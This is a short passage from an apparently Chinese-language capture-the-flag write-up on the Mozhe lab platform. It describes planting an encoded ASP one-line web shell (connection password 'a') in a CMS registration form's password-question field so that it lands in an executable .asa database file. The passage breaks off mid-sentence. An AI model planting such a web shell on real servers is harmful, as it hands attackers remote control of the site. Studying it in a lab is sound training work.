墨者 - CMS系統漏洞分析溯源(第3題)

根據題目提示 直接在密碼問題輸入   十攤救畲整堙壤敝瑤V三-l慵, 這是一句話木馬<%execute(raquest("a"))%>的另一種編碼形式(連接密碼是「a」) 爲什麼在密碼問題輸入一句話呢 因爲儲存註冊信息的數據庫文件是.asa文件,位於/data/ask_ncwasp.asa。 上傳一句話木馬將會被執行,爲什麼只能是密碼問題框呢 因爲其他都做了字符校驗,而問題回答做了MD5加密(失去
相關文章
相關標籤/搜索